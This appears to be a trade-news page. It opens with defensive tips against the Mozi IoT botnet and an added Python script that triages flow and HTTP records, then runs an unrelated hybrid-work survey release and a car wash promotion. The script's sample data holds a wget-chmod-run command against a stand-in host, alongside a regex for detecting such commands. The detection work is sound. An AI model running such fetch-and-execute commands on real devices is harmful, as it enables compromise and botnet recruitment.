Tips to Protect Enterprise Networks and Resources Against Mozi

By: Amr Alashaal, Regional Vice President – Middle East at A10 Networks

Malware has been playing an important role in the expansion of botnets, automating the process of bot infection and recruitment. These botnets are then used to launch large scale DDoS attacks. One highly prevalent malware in the DDoS world is Mozi.

Mozi is a DDoS-focused botnet that uses a large set of remote code execution (RCE) exploits for known CVEs in IoT devices to infect them. These IoT devices include readily available and commonly used DVRs and network gateways. Once a device is infected, the botnet uses peer-to-peer connectivity to send and receive configuration updates and attack commands. Mozi was first identified in 2019 and has been evolving and growing in size ever since. It can now persist on network devices by writing itself into the device's file system, so it remains functional even after the device is rebooted. During the first half of 2021, Mozi peaked at over 360,000 unique systems seen from more than 285,000 unique source IP addresses; the gap between the two counts is likely due to network address translation.

In order to protect their networks and resources, organizations should take the following steps to block Mozi-infected systems and the malicious traffic they generate:

  1. Never Trust, Always Verify: Incorporate the Zero Trust model and its key principles into your security strategy. Create micro-perimeters within your networks. Limit access to your resources and invest in modern, AI/ML-based solutions. Ensure visibility not only into the endpoints and network nodes, but also into users, their activities, and workflows.
  2. Investigate Whether You are Already Infected: Mozi's initial infection arrives as RCE exploit requests sent to ports 80, 8080, 8443, etc. This makes initial infections stand out, so they can be tracked with a low false-positive rate. If your network devices suddenly start generating abnormal amounts of TCP or UDP traffic, immediately isolate the suspicious devices and limit the traffic originating from them. If this is not possible, apply global rate limiting to all traffic until you have tracked down the source.
  3. Observe and Block Commonly Exploited Ports: Closely monitor any traffic using TCP ports 60001, 37215, 5555, 52869 and 49152, both before and after a suspected infection. While these aren't the only ports Mozi uses, they can help find the needle in the haystack. As a general good practice, monitor and block sources that send TCP SYNs to ports 23 and 2323, since most IoT malware uses Telnet to initiate device infections.
  4. Take a Closer Look at the Payloads: If your network devices are generating large amounts of traffic, look at the payloads (i.e., the HTTP POST requests carrying the exploit, as shown on page 13 of the source report). Regular expressions can be used to filter these malicious requests out and block them before they infect other devices.
  5. Block BitTorrent: Since BitTorrent is one of the most common peer-to-peer networks Mozi uses for command and control (C2) communication, block any BitTorrent traffic entering or leaving the network. Depending on your customer type, a large volume of BitTorrent traffic can by itself be a dead giveaway of an infection.
  6. Ensure Your Security is up to Date: Make sure your security infrastructure is updated regularly and that your IoT devices run the latest firmware with all necessary security patches applied. Track the CVEs affecting your network devices and apply patches as they become available. Where no fix is available, take appropriate mitigating action based on the particular CVE.
  7. Employ or Review DDoS Baselining and AI/ML Techniques: Modern DDoS techniques such as baselining, which flags anomalous behavior against historical norms, and AI/ML techniques for detection and zero-day attack prevention can be a force multiplier for your security team, since tasks that would otherwise be manual can be detected and handled efficiently, 24×7.
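As an added example (not part of the A10 text), the following Python script shows how the indicators from steps 2 to 5 and the simple baselining of step 7 could be checked over flow and HTTP records. The record format, the per-host byte baselines, the ten-times-baseline threshold, the BitTorrent port range (the conventional 6881 to 6889; real DHT traffic can use any port) and the download-command regex are all assumptions for illustration, not signatures from the page; the sample records are constructed.

```python
"""Triage helper for the Mozi indicators listed above (added example).

Assumptions (not from the page): flow records are dicts shaped like
SAMPLE_FLOWS, baselines are per-host byte counts from a quiet period,
BT_PORTS is the conventional BitTorrent range, and DOWNLOAD_RE is a
generic second-stage download indicator rather than a Mozi signature.
"""
import re
from collections import defaultdict

# Ports called out in the text: Mozi-related TCP ports and the Telnet
# ports abused for initial IoT infection.
MOZI_PORTS = {60001, 37215, 5555, 52869, 49152}
TELNET_PORTS = {23, 2323}
# Ports on which the initial RCE arrives, per the text.
RCE_PORTS = {80, 8080, 8443}
# Conventional BitTorrent port range (assumption; DHT can use any port).
BT_PORTS = set(range(6881, 6890))
# Generic "fetch and run a second stage" pattern (assumption for illustration).
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp)\b.*(chmod|\.sh\b|/bin/sh)", re.I)

# Constructed sample flow records (not real telemetry). flags: "S" = SYN only.
SAMPLE_FLOWS = [
    {"src": "10.0.0.7",  "dst": "198.51.100.2", "proto": "tcp", "dport": 23,    "flags": "S",  "bytes": 60},
    {"src": "10.0.0.7",  "dst": "198.51.100.3", "proto": "tcp", "dport": 2323,  "flags": "S",  "bytes": 60},
    {"src": "10.0.0.7",  "dst": "198.51.100.4", "proto": "tcp", "dport": 37215, "flags": "S",  "bytes": 60},
    {"src": "10.0.0.7",  "dst": "203.0.113.9",  "proto": "udp", "dport": 6881,  "flags": "",   "bytes": 48000},
    {"src": "10.0.0.12", "dst": "10.0.0.5",     "proto": "tcp", "dport": 443,   "flags": "SA", "bytes": 9200},
]
# Constructed HTTP request records; the first body mimics a generic IoT RCE payload.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.7", "dport": 80, "method": "POST", "path": "/cgi-bin/example",
     "body": "cmd=cd /tmp; wget http://192.0.2.10/x.sh; chmod +x x.sh; ./x.sh"},
    {"src": "10.0.0.12", "dport": 8443, "method": "POST", "path": "/api/login",
     "body": "user=alice&pass=secret"},
]
# Constructed per-host byte baselines from a "normal" window.
BASELINE_BYTES = {"10.0.0.7": 1500, "10.0.0.12": 8000}


def port_indicators(flows):
    """Map each source host to the watched ports it sent bare TCP SYNs to (steps 3)."""
    hits = defaultdict(set)
    for f in flows:
        if f["proto"] != "tcp" or "S" not in f["flags"] or "A" in f["flags"]:
            continue  # only outbound connection attempts, not replies
        if f["dport"] in MOZI_PORTS | TELNET_PORTS:
            hits[f["src"]].add(f["dport"])
    return {src: sorted(ports) for src, ports in hits.items()}


def bittorrent_talkers(flows):
    """Hosts sending anything to the conventional BitTorrent port range (step 5)."""
    return sorted({f["src"] for f in flows if f["dport"] in BT_PORTS})


def volume_anomalies(flows, baseline, factor=10):
    """Hosts whose total bytes exceed factor x their baseline (steps 2 and 7)."""
    totals = defaultdict(int)
    for f in flows:
        totals[f["src"]] += f["bytes"]
    return {src: total for src, total in totals.items()
            if src in baseline and total > factor * baseline[src]}


def flag_exploit_requests(requests):
    """(src, path) for POSTs to RCE ports whose body matches DOWNLOAD_RE (step 4)."""
    return [(r["src"], r["path"]) for r in requests
            if r["method"] == "POST" and r["dport"] in RCE_PORTS
            and DOWNLOAD_RE.search(r["body"])]


def triage(flows=SAMPLE_FLOWS, requests=SAMPLE_REQUESTS, baseline=BASELINE_BYTES):
    """Combine the indicators and list the hosts that should be isolated first."""
    ports = port_indicators(flows)
    bt = bittorrent_talkers(flows)
    volume = volume_anomalies(flows, baseline)
    payloads = flag_exploit_requests(requests)
    suspects = set(ports) | set(bt) | set(volume) | {src for src, _ in payloads}
    return {"ports": ports, "bittorrent": bt, "volume": volume,
            "payloads": payloads, "isolate": sorted(suspects)}


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Run against real data, the byte baselines would come from a historical window per device and the regex would be replaced by vendor-supplied signatures for the CVEs your devices actually carry; the structure (port watch, volume-versus-baseline, payload inspection, one isolation list) is the part that carries over.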

Hybrid Workers Bring Dangerous Hybrid Habits: New Aruba Survey Uncovers Emerging Security Threats Linked to ‘Generation Novel’

Business leaders must strike a balance between flexibility and security to address risky behaviours and evolving expectations of today’s tech-savvy workforce

After years of responding to the needs of Gen X and Gen Y, a new study from Aruba, a Hewlett Packard Enterprise company, suggests employers have a whole new generation to grapple with post-pandemic – with 85% of hybrid workers saying they identify with the traits of the emerging Generation Novel (Gen-N).

Coined by digital anthropologist Brian Solis, Gen-N describes a cross-generational cohort of people who thrive on digital-first experiences, and place greater value on personalization, customization, and transparency from the brands they buy from, work for, and support. Above all else, they also understand, use and demand more from technology than ever before – both at home and work.

According to the study of 5,018 hybrid workers across EMEA, 78% of respondents say they use technology more now than they did before COVID-19, and 75% consider themselves to be ‘digitally savvy’. Sixty-nine percent of respondents agree they now have more of an opinion on the technology they use at work and 71% feel it’s important to be able to customize their workplace tech set-up to suit their individual preferences.

The survey also revealed the risks this new generation will bring to the workplace if their expectations continue to go unmet. As it stands, only 38% of respondents say they have any significant choice in their workplace technology. Without the right technology, workers indicated they will experience decreased productivity (35%) and a poorer work/life balance (23%). Gen-N's expectations around increased flexibility and confidence in their technical abilities also open businesses up to a number of security risks relating to where, when, and what employees connect to the network: 50% of respondents, for example, say they are more likely to try to resolve a tech issue themselves now than they would have been before the pandemic.

Additional key findings from the report reveal:

Hybrid workers have a new perspective on the role of workplace technology:

  • 80% of our respondents say their company must maintain policies that encourage healthy technology use.
  • While 73% believe technology has a role to play in fostering an inclusive environment in the new hybrid workplace, 44% believe it is not currently doing so.

Hybrid workers bring new risks to the workplace if their needs go unmet:

  • When encountering a tech issue at work, nearly three quarters (74%) of hybrid workers say they expect it to be resolved in 20 minutes or less – and over two fifths (42%) in under 10 minutes.
  • Over half (55%) of our survey respondents admit to connecting to a non-password protected public network at least once a week, but only a third (33%) consistently think of the security risks in doing so.
  • Meanwhile, as many as 82% are still using their personal mobile device to access work information.

“Our research suggests that this emerging generation of hybrid workers, with its evolving behaviours and heightened expectations, will put new demands on employers when it comes to workplace technology,” said Morten Illum, Vice President, EMEA for Aruba, a Hewlett Packard Enterprise company. “In order to mitigate the security risk that Gen-N poses, as well as boost efficiency within their workforce and support their employees, businesses must address these new needs. Striking the balance between an open but secure network will afford employees the flexibility, freedom and personalization they now seek, without compromising on security.”

To read the full report, including recommendations on the actions business leaders must take to meet the needs of Gen-N in a hybrid workplace, visit https://www.arubanetworks.com/assets/eo/eBook_Hybrid-Workplace-Generation-Novel.pdf

New offers for customers from Express Auto Wash

Car owners can get 30 Express Gold exterior washes, valid for six months

Express Auto Wash (EAW), a premium, environment-friendly automatic car wash facility located behind Mushrif Mall in Abu Dhabi, introduced a new package this month: car owners can get 30 Express Gold exterior washes for AED 500, valid for six months.

The facility also recently introduced new Express Gold service packages as well as VIP sanitization packages for cars. The Express Gold package offers residents six washes for AED 100, valid for 30 days for a single plate number, and can be booked online. Thorough sanitization for sedans and SUVs can also be purchased for AED 100.

Open from 9am to 9pm daily, the car wash facility is known for its thorough five-minute exterior wash, ideal for busy executives. Cars are cleaned using premium products from the USA; the environment-friendly facility allows multiple cars to be washed simultaneously, saving valuable time, and recycles 95% of the water.

Express Auto Wash has the most reliable and safest high-tech car wash systems with high-pressure undercarriage water nozzles that add to the efficiency of the wash while the MN Tech 21 Turbo Drying System completes the drying process.

The fast yet thorough clean saves customers valuable time that can be spent more productively at home and in the office. Express Auto Wash also offers a touch-free car wash for more delicate and premium cars.

An exterior sedan wash costs AED 30 and an exterior SUV wash costs AED 35.